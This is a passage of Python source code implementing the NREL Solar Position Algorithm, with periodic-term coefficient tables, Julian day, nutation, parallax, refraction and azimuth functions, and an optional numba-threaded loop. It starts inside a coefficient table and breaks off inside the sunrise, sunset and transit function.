[33.0, 0.59, 17789.85],
[30.0, 0.44, 83996.85],
[30.0, 2.74, 1349.87],
[25.0, 3.16, 4690.48]]
HELIO_LONG_TABLE_LIST_1 = [[628331966747.0, 0.0, 0.0],
[206059.0, 2.678235, 6283.07585],
[4303.0, 2.6351, 12566.1517],
[425.0, 1.59, 3.523],
[119.0, 5.796, 26.298],
[109.0, 2.966, 1577.344],
[93.0, 2.59, 18849.23],
[72.0, 1.14, 529.69],
[68.0, 1.87, 398.15],
[67.0, 4.41, 5507.55],
[59.0, 2.89, 5223.69],
[56.0, 2.17, 155.42],
[45.0, 0.4, 796.3],
[36.0, 0.47, 775.52],
[29.0, 2.65, 7.11],
[21.0, 5.34, 0.98],
[19.0, 1.85, 5486.78],
[19.0, 4.97, 213.3],
[17.0, 2.99, 6275.96],
[16.0, 0.03, 2544.31],
[16.0, 1.43, 2146.17],
[15.0, 1.21, 10977.08],
[12.0, 2.83, 1748.02],
[12.0, 3.26, 5088.63],
[12.0, 5.27, 1194.45],
[12.0, 2.08, 4694.0],
[11.0, 0.77, 553.57],
[10.0, 1.3, 6286.6],
[10.0, 4.24, 1349.87],
[9.0, 2.7, 242.73],
[9.0, 5.64, 951.72],
[8.0, 5.3, 2352.87],
[6.0, 2.65, 9437.76],
[6.0, 4.67, 4690.48],
]
HELIO_LONG_TABLE_LIST_2 = [[52919.0, 0.0, 0.0],
[8720.0, 1.0721, 6283.0758],
[309.0, 0.867, 12566.152],
[27.0, 0.05, 3.52],
[16.0, 5.19, 26.3],
[16.0, 3.68, 155.42],
[10.0, 0.76, 18849.23],
[9.0, 2.06, 77713.77],
[7.0, 0.83, 775.52],
[5.0, 4.66, 1577.34],
[4.0, 1.03, 7.11],
[4.0, 3.44, 5573.14],
[3.0, 5.14, 796.3],
[3.0, 6.05, 5507.55],
[3.0, 1.19, 242.73],
[3.0, 6.12, 529.69],
[3.0, 0.31, 398.15],
[3.0, 2.28, 553.57],
[2.0, 4.38, 5223.69],
[2.0, 3.75, 0.98]]
HELIO_LONG_TABLE_LIST_3 = [[289.0, 5.844, 6283.076],
[35.0, 0.0, 0.0],
[17.0, 5.49, 12566.15],
[3.0, 5.2, 155.42],
[1.0, 4.72, 3.52],
[1.0, 5.3, 18849.23],
[1.0, 5.97, 242.73]
]
HELIO_LONG_TABLE_LIST_4 = [[114.0, 3.142, 0.0],
[8.0, 4.13, 6283.08],
[1.0, 3.84, 12566.15]]
def julian_day_dt(year, month, day, hour, minute, second, microsecond):
"""This is the original way to calculate the julian day from the NREL paper.
However, it is much faster to convert to unix/epoch time and then convert to
julian day. Note that the date must be UTC.
"""
# Not used anywhere!
if month <= 2:
year = year-1
month = month+12
a = int(year/100)
b = 2 - a + int(a * 0.25)
frac_of_day = (microsecond + (second + minute * 60 + hour * 3600)
) * 1.0 / (3600*24)
d = day + frac_of_day
jd = (int(365.25 * (year + 4716)) + int(30.6001 * (month + 1)) + d +
b - 1524.5)
return jd
def julian_day(unixtime):
jd = unixtime*1.1574074074074073e-05 + 2440587.5
# jd = unixtime/86400.0 + 2440587.5
return jd
def julian_ephemeris_day(julian_day, delta_t):
jde = julian_day + delta_t*1.1574074074074073e-05
# jde = julian_day + delta_t * 1.0 / 86400.0
return jde
def julian_century(julian_day):
jc = (julian_day - 2451545.0)*2.7378507871321012e-05# * 1.0 / 36525
return jc
def julian_ephemeris_century(julian_ephemeris_day):
# 1/36525.0 = 2.7378507871321012e-05
jce = (julian_ephemeris_day - 2451545.0)*2.7378507871321012e-05
return jce
def julian_ephemeris_millennium(julian_ephemeris_century):
jme = julian_ephemeris_century*0.1
return jme
def heliocentric_longitude(jme):
# Might be able to replace this with a pade approximation?
# Looping over rows is probably still faster than (a, b, c)
# Maximum optimization
l0 = 0.0
l1 = 0.0
l2 = 0.0
l3 = 0.0
l4 = 0.0
l5 = 0.0
for row in range(64):
HELIO_LONG_TABLE_LIST_0_ROW = HELIO_LONG_TABLE_LIST_0[row]
l0 += (HELIO_LONG_TABLE_LIST_0_ROW[0]
* cos(HELIO_LONG_TABLE_LIST_0_ROW[1]
+ HELIO_LONG_TABLE_LIST_0_ROW[2] * jme)
)
for row in range(34):
HELIO_LONG_TABLE_LIST_1_ROW = HELIO_LONG_TABLE_LIST_1[row]
l1 += (HELIO_LONG_TABLE_LIST_1_ROW[0]
* cos(HELIO_LONG_TABLE_LIST_1_ROW[1]
+ HELIO_LONG_TABLE_LIST_1_ROW[2] * jme)
)
for row in range(20):
HELIO_LONG_TABLE_LIST_2_ROW = HELIO_LONG_TABLE_LIST_2[row]
l2 += (HELIO_LONG_TABLE_LIST_2_ROW[0]
* cos(HELIO_LONG_TABLE_LIST_2_ROW[1]
+ HELIO_LONG_TABLE_LIST_2_ROW[2] * jme)
)
for row in range(7):
HELIO_LONG_TABLE_LIST_3_ROW = HELIO_LONG_TABLE_LIST_3[row]
l3 += (HELIO_LONG_TABLE_LIST_3_ROW[0]
* cos(HELIO_LONG_TABLE_LIST_3_ROW[1]
+ HELIO_LONG_TABLE_LIST_3_ROW[2] * jme)
)
for row in range(3):
HELIO_LONG_TABLE_LIST_4_ROW = HELIO_LONG_TABLE_LIST_4[row]
l4 += (HELIO_LONG_TABLE_LIST_4_ROW[0]
* cos(HELIO_LONG_TABLE_LIST_4_ROW[1]
+ HELIO_LONG_TABLE_LIST_4_ROW[2] * jme)
)
# l5 = (HELIO_LONG_TABLE_LIST_5[0][0]*cos(HELIO_LONG_TABLE_LIST_5[0][1]))
l5 = -0.9999987317275395
l_rad = (jme*(jme*(jme*(jme*(jme*l5 + l4) + l3) + l2) + l1) + l0)*1E-8
l = rad2deg*l_rad
return l % 360
def heliocentric_latitude(jme):
b0 = 0.0
b1 = 0.0
for row in range(5):
HELIO_LAT_TABLE_LIST_0_ROW = HELIO_LAT_TABLE_LIST_0[row]
b0 += (HELIO_LAT_TABLE_LIST_0_ROW[0]
* cos(HELIO_LAT_TABLE_LIST_0_ROW[1]
+ HELIO_LAT_TABLE_LIST_0_ROW[2] * jme)
)
HELIO_LAT_TABLE_LIST_1_ROW = HELIO_LAT_TABLE_LIST_1[0]
b1 += (HELIO_LAT_TABLE_LIST_1_ROW[0]
* cos(HELIO_LAT_TABLE_LIST_1_ROW[1]
+ HELIO_LAT_TABLE_LIST_1_ROW[2] * jme))
HELIO_LAT_TABLE_LIST_1_ROW = HELIO_LAT_TABLE_LIST_1[1]
b1 += (HELIO_LAT_TABLE_LIST_1_ROW[0]
* cos(HELIO_LAT_TABLE_LIST_1_ROW[1]
+ HELIO_LAT_TABLE_LIST_1_ROW[2] * jme))
b_rad = (b0 + b1 * jme)*1E-8
b = rad2deg*b_rad
return b
def heliocentric_radius_vector(jme):
# no optimizations can be thought of
r0 = 0.0
r1 = 0.0
r2 = 0.0
r3 = 0.0
r4 = 0.0
# Would be possible to save a few multiplies of table1row[2]*jme, table1row[1]*jme as they are dups
for row in range(40):
table0row = HELIO_RADIUS_TABLE_LIST_0[row]
r0 += (table0row[0]*cos(table0row[1] + table0row[2]*jme))
for row in range(10):
table1row = HELIO_RADIUS_TABLE_LIST_1[row]
r1 += (table1row[0]*cos(table1row[1] + table1row[2]*jme))
for row in range(6):
table2row = HELIO_RADIUS_TABLE_LIST_2[row]
r2 += (table2row[0]*cos(table2row[1] + table2row[2]*jme))
table3row = HELIO_RADIUS_TABLE_LIST_3[0]
r3 += (table3row[0]*cos(table3row[1] + table3row[2]*jme))
table3row = HELIO_RADIUS_TABLE_LIST_3[1]
r3 += (table3row[0]*cos(table3row[1] + table3row[2]*jme))
# table4row = HELIO_RADIUS_TABLE_LIST_4[0]
# r4 = (table4row[0]*cos(table4row[1] + table4row[2]*jme))
r4 = (4.0*cos(2.56 + 6283.08*jme))
return (jme*(jme*(jme*(jme*r4 + r3) + r2) + r1) + r0)*1E-8
def geocentric_longitude(heliocentric_longitude):
theta = heliocentric_longitude + 180.0
return theta % 360
def geocentric_latitude(heliocentric_latitude):
beta = -heliocentric_latitude
return beta
def mean_elongation(julian_ephemeris_century):
return (julian_ephemeris_century*(julian_ephemeris_century
*(5.27776898149614e-6*julian_ephemeris_century - 0.0019142)
+ 445267.11148) + 297.85036)
# x0 = (297.85036
# + 445267.111480 * julian_ephemeris_century
# - 0.0019142 * julian_ephemeris_century**2
# + julian_ephemeris_century**3 / 189474.0)
# return x0
def mean_anomaly_sun(julian_ephemeris_century):
return (julian_ephemeris_century*(julian_ephemeris_century*(
-3.33333333333333e-6*julian_ephemeris_century - 0.0001603)
+ 35999.05034) + 357.52772)
# x1 = (357.52772
# + 35999.050340 * julian_ephemeris_century
# - 0.0001603 * julian_ephemeris_century**2
# - julian_ephemeris_century**3 / 300000.0)
# return x1
def mean_anomaly_moon(julian_ephemeris_century):
return (julian_ephemeris_century*(julian_ephemeris_century*(
1.77777777777778e-5*julian_ephemeris_century + 0.0086972)
+ 477198.867398) + 134.96298)
# x2 = (134.96298
# + 477198.867398 * julian_ephemeris_century
# + 0.0086972 * julian_ephemeris_century**2
# + julian_ephemeris_century**3 / 56250)
# return x2
def moon_argument_latitude(julian_ephemeris_century):
return julian_ephemeris_century*(julian_ephemeris_century*(
3.05558101873071e-6*julian_ephemeris_century - 0.0036825)
+ 483202.017538) + 93.27191
# x3 = (93.27191
# + 483202.017538 * julian_ephemeris_century
# - 0.0036825 * julian_ephemeris_century**2
# + julian_ephemeris_century**3 / 327270)
# return x3
def moon_ascending_longitude(julian_ephemeris_century):
return (julian_ephemeris_century*(julian_ephemeris_century*(
2.22222222222222e-6*julian_ephemeris_century + 0.0020708)
- 1934.136261) + 125.04452)
# x4 = (125.04452
# - 1934.136261 * julian_ephemeris_century
# + 0.0020708 * julian_ephemeris_century**2
# + julian_ephemeris_century**3 / 450000)
# return x4
def longitude_obliquity_nutation(julian_ephemeris_century, x0, x1, x2, x3, x4):
x0, x1, x2, x3, x4 = deg2rad*x0, deg2rad*x1, deg2rad*x2, deg2rad*x3, deg2rad*x4
delta_psi_sum = 0.0
delta_eps_sum = 0.0
# If the sincos formulation is used, the speed up is ~8% with numba.
for row in range(63):
arg = (NUTATION_YTERM_LIST_0[row]*x0 +
NUTATION_YTERM_LIST_1[row]*x1 +
NUTATION_YTERM_LIST_2[row]*x2 +
NUTATION_YTERM_LIST_3[row]*x3 +
NUTATION_YTERM_LIST_4[row]*x4)
arr = NUTATION_ABCD_LIST[row]
sinarg, cosarg = sincos(arg)
# sinarg = sin(arg)
# cosarg = sqrt(1.0 - sinarg*sinarg)
t0 = (arr[0] + julian_ephemeris_century*arr[1])
delta_psi_sum += t0*sinarg
# delta_psi_sum += t0*sin(arg)
t0 = (arr[2] + julian_ephemeris_century*arr[3])
delta_eps_sum += t0*cosarg
# delta_eps_sum += t0*cos(arg)
delta_psi = delta_psi_sum/36000000.0
delta_eps = delta_eps_sum/36000000.0
res = [0.0]*2
res[0] = delta_psi
res[1] = delta_eps
return res
def longitude_nutation(julian_ephemeris_century, x0, x1, x2, x3, x4):
x0, x1, x2, x3, x4 = deg2rad*x0, deg2rad*x1, deg2rad*x2, deg2rad*x3, deg2rad*x4
delta_psi_sum = 0.0
for row in range(63):
# # None can be skipped but the multiplies can be with effort -2 to 2 with dict - just might be slower
argsin = (NUTATION_YTERM_LIST_0[row]*x0 +
NUTATION_YTERM_LIST_1[row]*x1 +
NUTATION_YTERM_LIST_2[row]*x2 +
NUTATION_YTERM_LIST_3[row]*x3 +
NUTATION_YTERM_LIST_4[row]*x4)
term = (NUTATION_ABCD_LIST[row][0] + NUTATION_ABCD_LIST[row][1]
* julian_ephemeris_century)*sin(argsin)
delta_psi_sum += term
delta_psi = delta_psi_sum/36000000.0
return delta_psi
def obliquity_nutation(julian_ephemeris_century, x0, x1, x2, x3, x4):
delta_eps_sum = 0.0
x0, x1, x2, x3, x4 = deg2rad*x0, deg2rad*x1, deg2rad*x2, deg2rad*x3, deg2rad*x4
for row in range(63):
argcos = (NUTATION_YTERM_LIST_0[row]*x0 +
NUTATION_YTERM_LIST_1[row]*x1 +
NUTATION_YTERM_LIST_2[row]*x2 +
NUTATION_YTERM_LIST_3[row]*x3 +
NUTATION_YTERM_LIST_4[row]*x4)
term = (NUTATION_ABCD_LIST[row][2]
+ NUTATION_ABCD_LIST[row][3]*julian_ephemeris_century)*cos(argcos)
delta_eps_sum += term
delta_eps = delta_eps_sum/36000000.0
return delta_eps
def mean_ecliptic_obliquity(julian_ephemeris_millennium):
U = 0.1*julian_ephemeris_millennium
e0 = (U*(U*(U*(U*(U*(U*(U*(U*(U*(2.45*U + 5.79) + 27.87) + 7.12) - 39.05)
- 249.67) - 51.38) + 1999.25) - 1.55) - 4680.93) + 84381.448)
return e0
def true_ecliptic_obliquity(mean_ecliptic_obliquity, obliquity_nutation):
# e0 = mean_ecliptic_obliquity
# deleps = obliquity_nutation
return mean_ecliptic_obliquity*0.0002777777777777778 + obliquity_nutation
# e = e0/3600.0 + deleps
# return e
def aberration_correction(earth_radius_vector):
# -20.4898 / (3600)
deltau = -0.005691611111111111/earth_radius_vector
return deltau
def apparent_sun_longitude(geocentric_longitude, longitude_nutation,
aberration_correction):
lamd = geocentric_longitude + longitude_nutation + aberration_correction
return lamd
def mean_sidereal_time(julian_day, julian_century):
julian_century2 = julian_century*julian_century
v0 = (280.46061837 + 360.98564736629*(julian_day - 2451545.0)
+ 0.000387933*julian_century2
- julian_century2*julian_century/38710000.0)
return v0 % 360.0
def apparent_sidereal_time(mean_sidereal_time, longitude_nutation,
true_ecliptic_obliquity):
v = mean_sidereal_time + longitude_nutation*cos(deg2rad*true_ecliptic_obliquity)
return v
def geocentric_sun_right_ascension(apparent_sun_longitude,
true_ecliptic_obliquity,
geocentric_latitude):
num = (sin(deg2rad*apparent_sun_longitude)
* cos(deg2rad*true_ecliptic_obliquity)
- tan(deg2rad*geocentric_latitude)
* sin(deg2rad*true_ecliptic_obliquity))
alpha = degrees(atan2(num, cos(
deg2rad*apparent_sun_longitude)))
return alpha % 360
def geocentric_sun_declination(apparent_sun_longitude, true_ecliptic_obliquity,
geocentric_latitude):
delta = degrees(asin(sin(deg2rad*geocentric_latitude) *
cos(deg2rad*true_ecliptic_obliquity) +
cos(deg2rad*geocentric_latitude) *
sin(deg2rad*true_ecliptic_obliquity) *
sin(deg2rad*apparent_sun_longitude)))
return delta
def local_hour_angle(apparent_sidereal_time, observer_longitude,
sun_right_ascension):
"""Measured westward from south."""
H = apparent_sidereal_time + observer_longitude - sun_right_ascension
return H % 360
def equatorial_horizontal_parallax(earth_radius_vector):
return 8.794 / (3600.0 * earth_radius_vector)
def uterm(observer_latitude):
u = atan(0.99664719*tan(deg2rad*observer_latitude))
return u
def xterm(u, observer_latitude, observer_elevation):
# 1/6378140.0 = const
x = (cos(u) + observer_elevation*1.5678552054360676e-07*cos(deg2rad*observer_latitude))
return x
def yterm(u, observer_latitude, observer_elevation):
# 1/6378140.0 = const
y = (0.99664719 * sin(u) + observer_elevation*1.5678552054360676e-07
* sin(deg2rad*observer_latitude))
return y
def parallax_sun_right_ascension(xterm, equatorial_horizontal_parallax,
local_hour_angle, geocentric_sun_declination):
x0 = sin(deg2rad*equatorial_horizontal_parallax)
x1 = deg2rad*local_hour_angle
num = -xterm*x0*sin(x1)
denom = (cos(deg2rad*geocentric_sun_declination) - xterm*x0 * cos(x1))
delta_alpha = degrees(atan2(num, denom))
return delta_alpha
def topocentric_sun_right_ascension(geocentric_sun_right_ascension,
parallax_sun_right_ascension):
alpha_prime = geocentric_sun_right_ascension + parallax_sun_right_ascension
return alpha_prime
def topocentric_sun_declination(geocentric_sun_declination, xterm, yterm,
equatorial_horizontal_parallax,
parallax_sun_right_ascension,
local_hour_angle):
x0 = sin(deg2rad*equatorial_horizontal_parallax)
num = ((sin(deg2rad*geocentric_sun_declination) - yterm
* x0)
* cos(deg2rad*parallax_sun_right_ascension))
denom = (cos(deg2rad*geocentric_sun_declination) - xterm
* x0
* cos(deg2rad*local_hour_angle))
delta = degrees(atan2(num, denom))
return delta
def topocentric_local_hour_angle(local_hour_angle,
parallax_sun_right_ascension):
H_prime = local_hour_angle - parallax_sun_right_ascension
return H_prime
def topocentric_elevation_angle_without_atmosphere(observer_latitude,
topocentric_sun_declination,
topocentric_local_hour_angle
):
observer_latitude = observer_latitude
topocentric_sun_declination = topocentric_sun_declination
topocentric_local_hour_angle = topocentric_local_hour_angle
r_observer_latitude = deg2rad*observer_latitude
r_topocentric_sun_declination = deg2rad*topocentric_sun_declination
e0 = degrees(asin(
sin(r_observer_latitude)
* sin(r_topocentric_sun_declination)
+ cos(r_observer_latitude)
* cos(r_topocentric_sun_declination)
* cos(deg2rad*topocentric_local_hour_angle)))
return e0
def atmospheric_refraction_correction(local_pressure, local_temp,
topocentric_elevation_angle_wo_atmosphere,
atmos_refract):
# switch sets delta_e when the sun is below the horizon
switch = topocentric_elevation_angle_wo_atmosphere >= -1.0 * (
0.26667 + atmos_refract)
delta_e = ((local_pressure / 1010.0) * (283.0 / (273.0 + local_temp))
* 1.02 / (60.0 * tan(deg2rad*(
topocentric_elevation_angle_wo_atmosphere
+ 10.3 / (topocentric_elevation_angle_wo_atmosphere
+ 5.11))))) * switch
return delta_e
def topocentric_elevation_angle(topocentric_elevation_angle_without_atmosphere,
atmospheric_refraction_correction):
e = (topocentric_elevation_angle_without_atmosphere
+ atmospheric_refraction_correction)
return e
def topocentric_zenith_angle(topocentric_elevation_angle):
theta = 90.0 - topocentric_elevation_angle
return theta
def topocentric_astronomers_azimuth(topocentric_local_hour_angle,
topocentric_sun_declination,
observer_latitude):
num = sin(deg2rad*topocentric_local_hour_angle)
denom = (cos(deg2rad*topocentric_local_hour_angle)
* sin(deg2rad*observer_latitude)
- tan(deg2rad*topocentric_sun_declination)
* cos(deg2rad*observer_latitude))
gamma = degrees(atan2(num, denom))
return gamma % 360.0
def topocentric_azimuth_angle(topocentric_astronomers_azimuth):
phi = topocentric_astronomers_azimuth + 180.0
return phi % 360.0
def sun_mean_longitude(julian_ephemeris_millennium):
M = julian_ephemeris_millennium*(julian_ephemeris_millennium*(
julian_ephemeris_millennium*(julian_ephemeris_millennium*(
-5.0e-7*julian_ephemeris_millennium - 6.5359477124183e-5)
+ 2.00276381406341e-5) + 0.03032028) + 360007.6982779) + 280.4664567
return M
#@jcompile('float64(float64, float64, float64, float64)', nopython=True)
def equation_of_time(sun_mean_longitude, geocentric_sun_right_ascension,
longitude_nutation, true_ecliptic_obliquity):
term = cos(deg2rad*true_ecliptic_obliquity)
E = (sun_mean_longitude - 0.0057183 - geocentric_sun_right_ascension +
longitude_nutation * term)
# limit between 0 and 360
E = E % 360
# convert to minutes
E *= 4.0
greater = E > 20.0
less = E < -20.0
other = (E <= 20.0) & (E >= -20.0)
E = greater * (E - 1440.0) + less * (E + 1440.0) + other * E
return E
def earthsun_distance(unixtime, delta_t):
"""Calculates the distance from the earth to the sun using the NREL SPA
algorithm described in [1].
Parameters
----------
unixtime : numpy array
Array of unix/epoch timestamps to calculate solar position for.
Unixtime is the number of seconds since Jan. 1, 1970 00:00:00 UTC.
A pandas.DatetimeIndex is easily converted using .astype(np.int64)/10**9
delta_t : float
Difference between terrestrial time and UT. USNO has tables.
Returns
-------
R : array
Earth-Sun distance in AU.
References
----------
[1] Reda, I., Andreas, A., 2003. Solar position algorithm for solar
radiation applications. Technical report: NREL/TP-560- 34302. Golden,
USA, http://www.nrel.gov.
"""
jd = julian_day(unixtime)
jde = julian_ephemeris_day(jd, delta_t)
jce = julian_ephemeris_century(jde)
jme = julian_ephemeris_millennium(jce)
R = heliocentric_radius_vector(jme)
return R
def solar_position(unixtime, lat, lon, elev, pressure, temp, delta_t,
atmos_refract, sst=False):
"""Calculate the solar position using the NREL SPA algorithm described in
[1].
If numba is installed, the functions can be compiled
and the code runs quickly. If not, the functions
still evaluate but use numpy instead.
Parameters
----------
unixtime : numpy array
Array of unix/epoch timestamps to calculate solar position for.
Unixtime is the number of seconds since Jan. 1, 1970 00:00:00 UTC.
A pandas.DatetimeIndex is easily converted using .astype(np.int64)/10**9
lat : float
Latitude to calculate solar position for
lon : float
Longitude to calculate solar position for
elev : float
Elevation of location in meters
pressure : int or float
avg. yearly pressure at location in millibars;
used for atmospheric correction
temp : int or float
avg. yearly temperature at location in
degrees C; used for atmospheric correction
delta_t : float, optional
If delta_t is None, uses spa.calculate_deltat
using time.year and time.month from pandas.DatetimeIndex.
For most simulations specifing delta_t is sufficient.
Difference between terrestrial time and UT1.
*Note: delta_t = None will break code using nrel_numba,
this will be fixed in a future version.
By default, use USNO historical data and predictions
atmos_refrac : float, optional
The approximate atmospheric refraction (in degrees)
at sunrise and sunset.
numthreads: int, optional, default None
Number of threads to use for computation if numba>=0.17
is installed.
sst : bool, default False
If True, return only data needed for sunrise, sunset, and transit
calculations.
Returns
-------
list with elements:
apparent zenith,
zenith,
elevation,
apparent_elevation,
azimuth,
equation_of_time
References
----------
.. [1] I. Reda and A. Andreas, Solar position algorithm for solar radiation
applications. Solar Energy, vol. 76, no. 5, pp. 577-589, 2004.
.. [2] I. Reda and A. Andreas, Corrigendum to Solar position algorithm for
solar radiation applications. Solar Energy, vol. 81, no. 6, p. 838, 2007.
"""
jd = julian_day(unixtime)
jde = julian_ephemeris_day(jd, delta_t)
jc = julian_century(jd)
jce = julian_ephemeris_century(jde)
jme = julian_ephemeris_millennium(jce)
R = heliocentric_radius_vector(jme)
L = heliocentric_longitude(jme)
B = heliocentric_latitude(jme)
Theta = geocentric_longitude(L)
beta = geocentric_latitude(B)
x0 = mean_elongation(jce)
x1 = mean_anomaly_sun(jce)
x2 = mean_anomaly_moon(jce)
x3 = moon_argument_latitude(jce)
x4 = moon_ascending_longitude(jce)
delta_psi, delta_epsilon = longitude_obliquity_nutation(jce, x0, x1, x2, x3, x4)
epsilon0 = mean_ecliptic_obliquity(jme)
epsilon = true_ecliptic_obliquity(epsilon0, delta_epsilon)
delta_tau = aberration_correction(R)
lamd = apparent_sun_longitude(Theta, delta_psi, delta_tau)
v0 = mean_sidereal_time(jd, jc)
v = apparent_sidereal_time(v0, delta_psi, epsilon)
alpha = geocentric_sun_right_ascension(lamd, epsilon, beta)
delta = geocentric_sun_declination(lamd, epsilon, beta)
if sst: # numba: delete
return v, alpha, delta # numba: delete
m = sun_mean_longitude(jme)
eot = equation_of_time(m, alpha, delta_psi, epsilon)
H = local_hour_angle(v, lon, alpha)
xi = equatorial_horizontal_parallax(R)
u = uterm(lat)
x = xterm(u, lat, elev)
y = yterm(u, lat, elev)
delta_alpha = parallax_sun_right_ascension(x, xi, H, delta)
delta_prime = topocentric_sun_declination(delta, x, y, xi, delta_alpha, H)
H_prime = topocentric_local_hour_angle(H, delta_alpha)
e0 = topocentric_elevation_angle_without_atmosphere(lat, delta_prime,
H_prime)
delta_e = atmospheric_refraction_correction(pressure, temp, e0,
atmos_refract)
e = topocentric_elevation_angle(e0, delta_e)
theta = topocentric_zenith_angle(e)
theta0 = topocentric_zenith_angle(e0)
gamma = topocentric_astronomers_azimuth(H_prime, delta_prime, lat)
phi = topocentric_azimuth_angle(gamma)
return [theta, theta0, e, e0, phi, eot]
try:
if IS_NUMBA: # type: ignore
try:
import numpy as np
except:
pass
import numba
import numpy as np
import threading
# This is 3x slower without nogil
@numba.njit(nogil=True)
def solar_position_loop(unixtime, loc_args, out):
"""Loop through the time array and calculate the solar position."""
lat = loc_args[0]
lon = loc_args[1]
elev = loc_args[2]
pressure = loc_args[3]
temp = loc_args[4]
delta_t = loc_args[5]
atmos_refract = loc_args[6]
sst = loc_args[7]
esd = loc_args[8]
for i in range(len(unixtime)):
utime = unixtime[i]
jd = julian_day(utime)
jde = julian_ephemeris_day(jd, delta_t)
jc = julian_century(jd)
jce = julian_ephemeris_century(jde)
jme = julian_ephemeris_millennium(jce)
R = heliocentric_radius_vector(jme)
L = heliocentric_longitude(jme)
B = heliocentric_latitude(jme)
Theta = geocentric_longitude(L)
beta = geocentric_latitude(B)
x0 = mean_elongation(jce)
x1 = mean_anomaly_sun(jce)
x2 = mean_anomaly_moon(jce)
x3 = moon_argument_latitude(jce)
x4 = moon_ascending_longitude(jce)
# delta_psi = longitude_nutation(jce, x0, x1, x2, x3, x4)
# delta_epsilon = obliquity_nutation(jce, x0, x1, x2, x3, x4)
delta_psi, delta_epsilon = longitude_obliquity_nutation(jce, x0, x1, x2, x3, x4)
epsilon0 = mean_ecliptic_obliquity(jme)
epsilon = true_ecliptic_obliquity(epsilon0, delta_epsilon)
delta_tau = aberration_correction(R)
lamd = apparent_sun_longitude(Theta, delta_psi, delta_tau)
v0 = mean_sidereal_time(jd, jc)
v = apparent_sidereal_time(v0, delta_psi, epsilon)
alpha = geocentric_sun_right_ascension(lamd, epsilon, beta)
delta = geocentric_sun_declination(lamd, epsilon, beta)
# if sst:
# out[0, i] = v
# out[1, i] = alpha
# out[2, i] = delta
# continue
m = sun_mean_longitude(jme)
eot = equation_of_time(m, alpha, delta_psi, epsilon)
H = local_hour_angle(v, lon, alpha)
xi = equatorial_horizontal_parallax(R)
u = uterm(lat)
x = xterm(u, lat, elev)
y = yterm(u, lat, elev)
delta_alpha = parallax_sun_right_ascension(x, xi, H, delta)
delta_prime = topocentric_sun_declination(delta, x, y, xi, delta_alpha,
H)
H_prime = topocentric_local_hour_angle(H, delta_alpha)
e0 = topocentric_elevation_angle_without_atmosphere(lat, delta_prime,
H_prime)
delta_e = atmospheric_refraction_correction(pressure, temp, e0,
atmos_refract)
e = topocentric_elevation_angle(e0, delta_e)
theta = topocentric_zenith_angle(e)
theta0 = topocentric_zenith_angle(e0)
gamma = topocentric_astronomers_azimuth(H_prime, delta_prime, lat)
phi = topocentric_azimuth_angle(gamma)
out[0, i] = theta
out[1, i] = theta0
out[2, i] = e
out[3, i] = e0
out[4, i] = phi
out[5, i] = eot
def solar_position_numba(unixtime, lat, lon, elev, pressure, temp, delta_t,
atmos_refract, numthreads, sst=False, esd=False):
"""Calculate the solar position using the numba compiled functions
and multiple threads.
Very slow if functions are not numba compiled.
"""
# these args are the same for each thread
loc_args = np.array([lat, lon, elev, pressure, temp, delta_t,
atmos_refract, sst, esd])
# construct dims x ulength array to put the results in
ulength = unixtime.shape[0]
if sst:
dims = 3
elif esd:
dims = 1
else:
dims = 6
result = np.empty((dims, ulength), dtype=np.float64)
if unixtime.dtype != np.float64:
unixtime = unixtime.astype(np.float64)
if ulength < numthreads:
warnings.warn('The number of threads is more than the length of '
'the time array. Only using %s threads.' %(length))
numthreads = ulength
if numthreads <= 1:
solar_position_loop(unixtime, loc_args, result)
return result
# split the input and output arrays into numthreads chunks
split0 = np.array_split(unixtime, numthreads)
split2 = np.array_split(result, numthreads, axis=1)
chunks = [[a0, loc_args, split2[i]] for i, a0 in enumerate(split0)]
# Spawn one thread per chunk
threads = [threading.Thread(target=solar_position_loop, args=chunk)
for chunk in chunks]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
return result
except:
pass
def transit_sunrise_sunset(dates, lat, lon, delta_t):
"""Calculate the sun transit, sunrise, and sunset for a set of dates at a
given location.
Parameters
----------
dates : array
Numpy array of ints/floats corresponding to the Unix time
for the dates of interest, must be midnight UTC (00:00+00:00)
on the day of interest.
lat : float
Latitude of location to perform calculation for
lon : float
Longitude of location
delta_t : float
Difference between terrestrial time and UT. USNO has tables.
Returns
-------
tuple : (transit, sunrise, sunset) localized to UTC
>>> transit_sunrise_sunset(1523836800, 51.0486, -114.07, 70.68302220312503)
(1523907360.3863413, 1523882341.570479, 1523932345.7781625)
"""
condition = (dates % 86400) != 0.0
if condition:
raise ValueError('Input dates must be at 00:00 UTC')
utday = (dates // 86400) * 86400
ttday0 = utday - delta_t
ttdayn1 = ttday0 - 86400.0
ttdayp1 = ttday0 + 86400.0
# index 0 is v, 1 is alpha, 2 is delta
utday_res = solar_position(utday, 0, 0, 0, 0, 0, delta_t,
0, sst=True)
v = utday_res[0]
ttday0_res = solar_position(ttday0, 0, 0, 0, 0, 0, delta_t,
0, sst=True)
ttdayn1_res = solar_position(ttdayn1, 0, 0, 0, 0, 0, delta_t,
0, sst=True)
ttdayp1_res = solar_position(ttdayp1, 0, 0, 0, 0, 0, delta_t,
0, sst=True)
m0 = (ttday0_res[1] - lon - v) / 360
cos_arg = ((-0.014543315936696236 - sin(radians(lat)) # sin(radians(-0.8333)) = -0.0145...
* sin(radians(ttday0_res[2]))) /
(cos(radians(lat)) * cos(radians(ttday0_res[2]))))
if abs(cos_arg) > 1:
cos_arg = nan
H0 = degrees(acos(cos_arg)) % 180
m = [0.0]*3
m[0] = m0 % 1
m[1] = (m[0] - H0 / 360.0)
m[2] = (m[0] + H0 / 360.0)
# need to account for fractions of day that may be the next or previous
# day in UTC
add_a_day = m[2] >= 1
sub_a_day = m[1] < 0
m[1] = m[1] % 1
m[2] = m[2] % 1
vs = [0.0]*3
for i in range(3):
vs[i] = v + 360.985647*m[i]
n = [0.0]*3
for i in range(3):
n[i] = m[i] + delta_t / 86400.0
a = ttday0_res[1] - ttdayn1_res[1]
if abs(a) > 2:
a = a %1
ap = ttday0_res[2] - ttdayn1_res[2]
if (abs(ap) > 2):
ap = ap % 1
b = ttdayp1_res[1] - ttday0_res[1]
if (abs(b) > 2):
b = b % 1
bp = ttdayp1_res[2] - ttday0_res[2]
if abs(bp) > 2:
bp = bp % 1
c = b - a
cp = bp - ap
alpha_prime = [0.0]*3
delta_prime = [0.0]*3
Hp = [0.0]*3
for i in range(3):
alpha_prime[i] = ttday0_res[1] + (n[i] * (a + b + c * n[i]))*0.5
delta_prime[i] = ttday0_res[2] + (n[i] * (ap + bp + cp * n[i]))*0.5
Hp[i] = (vs[i] + lon - alpha_prime[i]) % 360
if Hp[i] >= 180.0:
